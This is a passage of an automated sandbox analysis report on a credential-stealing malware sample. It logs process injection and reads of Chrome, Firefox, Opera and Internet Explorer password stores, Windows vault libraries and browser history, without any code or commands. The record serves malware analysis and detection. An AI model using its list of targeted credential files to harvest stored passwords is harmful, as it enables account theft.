nssdbm3.dll	0x73dc0000	0x73dd6fff	Memory Mapped File	rwx	-
msvcp100.dll	0x73e00000	0x73e68fff	Memory Mapped File	rwx	-
mozglue.dll	0x73e70000	0x73e91fff	Memory Mapped File	rwx	-
msvcr100.dll	0x73ea0000	0x73f5dfff	Memory Mapped File	rwx	-
wsock32.dll	0x73f60000	0x73f66fff	Memory Mapped File	rwx	-
nss3.dll	0x73f70000	0x74124fff	Memory Mapped File	rwx	-
atl.dll	0x74110000	0x74123fff	Memory Mapped File	rwx	-
pstorec.dll	0x74130000	0x7413cfff	Memory Mapped File	rwx	-
vaultcli.dll	0x74130000	0x7413bfff	Memory Mapped File	rwx	-
version.dll	0x74260000	0x74268fff	Memory Mapped File	rwx	-
comctl32.dll	0x743d0000	0x7456dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x747e0000	0x7481afff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74ac0000	0x74ac7fff	Memory Mapped File	rwx	-
wow64win.dll	0x74ad0000	0x74b2bfff	Memory Mapped File	rwx	-
wow64.dll	0x74b30000	0x74b6efff	Memory Mapped File	rwx	-
cryptsp.dll	0x74ba0000	0x74bb5fff	Memory Mapped File	rwx	-
winmm.dll	0x74f20000	0x74f51fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75180000	0x7518bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75190000	0x751effff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75210000	0x752fffff	Memory Mapped File	rwx	-
ws2_32.dll	0x75300000	0x75334fff	Memory Mapped File	rwx	-
gdi32.dll	0x753d0000	0x7545ffff	Memory Mapped File	rwx	-
comdlg32.dll	0x75460000	0x754dafff	Memory Mapped File	rwx	-
shlwapi.dll	0x756d0000	0x75726fff	Memory Mapped File	rwx	-
kernel32.dll	0x75730000	0x7583ffff	Memory Mapped File	rwx	-
nsi.dll	0x75840000	0x75845fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75850000	0x75895fff	Memory Mapped File	rwx	-
psapi.dll	0x758a0000	0x758a4fff	Memory Mapped File	rwx	-
msasn1.dll	0x758b0000	0x758bbfff	Memory Mapped File	rwx	-
wininet.dll	0x758d0000	0x759c4fff	Memory Mapped File	rwx	-
advapi32.dll	0x759d0000	0x75a6ffff	Memory Mapped File	rwx	-
usp10.dll	0x75b00000	0x75b9cfff	Memory Mapped File	rwx	-
urlmon.dll	0x75ba0000	0x75cd5fff	Memory Mapped File	rwx	-
msctf.dll	0x75ce0000	0x75dabfff	Memory Mapped File	rwx	-
iertutil.dll	0x75db0000	0x75faafff	Memory Mapped File	rwx	-
ole32.dll	0x75fb0000	0x7610bfff	Memory Mapped File	rwx	-
shell32.dll	0x76110000	0x76d59fff	Memory Mapped File	rwx	-
imm32.dll	0x76d60000	0x76dbffff	Memory Mapped File	rwx	-
user32.dll	0x76dc0000	0x76ebffff	Memory Mapped File	rwx	-
sechost.dll	0x76ec0000	0x76ed8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x76ee0000	0x76f6efff	Memory Mapped File	rwx	-
msvcrt.dll	0x76fa0000	0x7704bfff	Memory Mapped File	rwx	-
crypt32.dll	0x770e0000	0x771fcfff	Memory Mapped File	rwx	-
private_0x0000000077230000	0x77230000	0x77329fff	Private Memory	rwx	-
private_0x0000000077330000	0x77330000	0x7744efff	Private Memory	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
lpk.dll	0x77600000	0x77609fff	Memory Mapped File	rwx	-
ntdll.dll	0x77630000	0x777affff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	0xb0c	address = 0x400000, size = 372736	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	0xb0c	address = 0x7efde008, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	0xb0c	address = 0x7efdf010, size = 4	1	Fn Data
Modify Control Flow	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	0xb0c	os_tid = 0x57c, address = 0x0	1	Fn

Host Behavior

File (892)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018090720180908\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	desired_access = GENERIC_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = GENERIC_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed_lng.ini	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018090720180908\index.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = time	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	type = file_attributes	1	Fn
Get Info	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	type = file_attributes	3	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	type = file_attributes	1	Fn
Get Info	C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll	type = file_attributes	1	Fn
Get Info	C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini	type = file_attributes	1	Fn
Get Info	C:\Program Files (x86)\Sea Monkey\nss3.dll	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	type = size, size_out = 0	5	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = size, size_out = 0	5	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data	type = file_attributes	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 8, size_out = 8	132	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 256, size_out = 256	116	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018090720180908\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018090720180908\index.dat	size = 8, size_out = 8	131	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018090720180908\index.dat	size = 256, size_out = 256	117	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 8, size_out = 8	81	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 256, size_out = 256	11	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 384, size_out = 384	2	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat	size = 8, size_out = 8	94	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat	size = 256, size_out = 256	2	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat	size = 8, size_out = 8	94	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat	size = 256, size_out = 256	2	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 100, size_out = 100	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 2048, size_out = 2048	4	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 16, size_out = 16	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 100, size_out = 100	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 2048, size_out = 2048	2	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 16, size_out = 16	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 3	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 1	8	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 11	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 9	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 8	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 17	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 15	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 14	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 12	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 13	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	size = 2	1	Fn Data

Registry (26)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla	-	1	Fn

Process (64)

Operation	Process	Additional Information	Count	Logfile
Get filename	c:\windows\system32\dwm.exe	file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\windows\explorer.exe	file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\windows\system32\taskhost.exe	file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\program files\microsoft office\root\office16\onenotem.exe	file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\program files\microsoft office\root\office16\winword.exe	file_name = C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\windows\system32\taskeng.exe	file_name = C:\Windows\System32\taskeng.exe, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\program files\microsoft office\root\office16\msoia.exe	file_name = C:\Program Files\Microsoft Office\root\Office16\msoia.exe, flags = PROCESS_NAME_WIN32	1	Fn
Get filename	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	file_name = C:\Program Files\Microsoft Office\root\Office16\msoia.exe, flags = PROCESS_NAME_WIN32	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\updates\16.0.10228.20104\officeclicktorun.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\google\deputy elite historical.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows media player\sttrianglereasoning.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\cleaner.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\mozilla maintenance service\cookie-perspective-pl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\monitor obesity medicine.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows portable devices\would cooling order.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft onedrive\assume_morocco_miss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\msbuild\tel-missions.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows photo viewer\sponsors.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows sidebar\developersworldsdisclaimers.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows nt\reach_depth_differently.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\amenities mumbai propecia.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\myanmarpublisher.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\considerationlabels.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\notre.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows nt\picks.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows media player\competitions-bangladesh.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\winword.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\sppsvc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officec2rclient.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\msoia.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\logonui.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (115)

Operation	Module	Additional Information	Count	Logfile
Load	comctl32.dll	base_address = 0x743d0000	1	Fn
Load	shell32.dll	base_address = 0x76110000	1	Fn
Load	advapi32.dll	base_address = 0x759d0000	2	Fn
Load	pstorec.dll	base_address = 0x74130000	1	Fn
Load	vaultcli.dll	base_address = 0x74130000	1	Fn
Load	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	base_address = 0x73f70000	1	Fn
Load	psapi.dll	base_address = 0x758a0000	1	Fn
Get Handle	c:\users\public\428.exe	base_address = 0x400000	22	Fn
Get Handle	C:\Program Files (x86)\Mozilla Firefox\nss3.dll	base_address = 0x0	1	Fn
